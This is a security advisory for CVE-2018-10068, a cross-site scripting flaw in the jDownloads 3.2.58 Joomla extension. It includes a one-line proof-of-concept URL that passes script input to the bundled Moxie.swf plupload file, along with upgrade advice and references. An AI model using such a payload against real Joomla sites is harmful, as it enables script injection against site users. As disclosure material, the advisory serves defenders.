Joomla Component jDownloads 3.2.58 – Cross Site Scripting

Authors:Sureshbabu Narvaneni   Risk:High

CVE:CVE-2018-10068            0day:Cross Site Scripting

0day-id:0DAY-10068             Date:2018-04-18

Description

A vulnerability was found in jDownloads Extension up to 3.2.58 on Joomla! and classified as problematic. This issue affects an unknown function. The manipulation with an unknown input leads to a cross site scripting vulnerability.

Technical Description

Cross-site scripting (XSS) vulnerability in plupoad flash component in jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script.

POC

# Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
# Google Dork: N/A
# Date: 14-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.jdownloads.com/
# Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html
# Affected Version: 3.2.58
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-10068


http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice

Solution

Upgrade to latest release.
https://extensions.joomla.org/extension/jdownloads/

Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068

https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting

Leave a Reply